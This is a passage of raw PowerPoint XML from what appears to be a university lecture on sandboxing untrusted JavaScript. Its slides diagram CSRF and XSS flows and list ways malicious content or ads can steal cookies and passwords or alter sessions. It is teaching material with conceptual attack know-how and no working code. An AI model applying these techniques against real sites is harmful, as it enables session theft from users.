            <a:ext cx="2068512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54284" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4572000"/>
            <a:ext cx="2906713" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54285" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2655888" y="2786063"/>
            <a:ext cx="2449512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54286"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54287"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a:t>visit server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54288" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2197100" y="4702175"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54289" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="23018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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54290" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="37338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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54291" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="41592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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54292" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="617537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54293" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="31242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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54294" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6019800"/>
            <a:ext cx="4377224" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>long do you stay logged on to Gmail?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Date Placeholder 22"/>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24" name="Footer Placeholder 23"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7607C58D-411B-4055-95DF-49DDFF3EC067}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988"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41989"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41990"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41991"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41992"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41993"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round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41994"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41995" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1733550"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41996" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41997" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2508250" y="2270125"/>
            <a:ext cx="2738438" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41998"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41999"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a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42000"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a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42001" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="19494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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42002" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="26066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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42003"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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42004"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42005"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42006"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a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42007"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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42008"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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Date Placeholder 24"/>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26" name="Footer Placeholder 2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Threats (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visit good site with bad content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad content may steal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Please retype your password”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> login filled in by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read authentication cookie from DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Request information from good server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad content may alter session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transaction generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why would a good site host bad content?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>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a:xfrm>
            <a:off x="6248400" y="6492875"/>
            <a:ext cx="2438400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>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Mashups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="Picture 1" descr="C:\Documents and Settings\John Mitchell\My Documents\research\papers\svn\post-message\figures\igoogle-before.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1219200"/>
            <a:ext cx="7324725" cy="508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Advertisements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9219" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1296987"/>
            <a:ext cx="6675437" cy="5027613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="me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Advertisements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1676400"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ad network, publisher have incentives to show ads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Could place ads in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Rules out more profitable floating ads, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ad network and publisher can try to screen ads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example:  Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Some limitations in current web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Ads may contain links to “images” that are part of ad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Important to remember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a very effective way to reach victims: $30-50 per 1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User does not have to click on anything to run malicious code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="6616700"/>
            <a:ext cx="482600" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3DABD6C4-A0D1-418E-B658-F8ECAE657C88}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>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Maps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
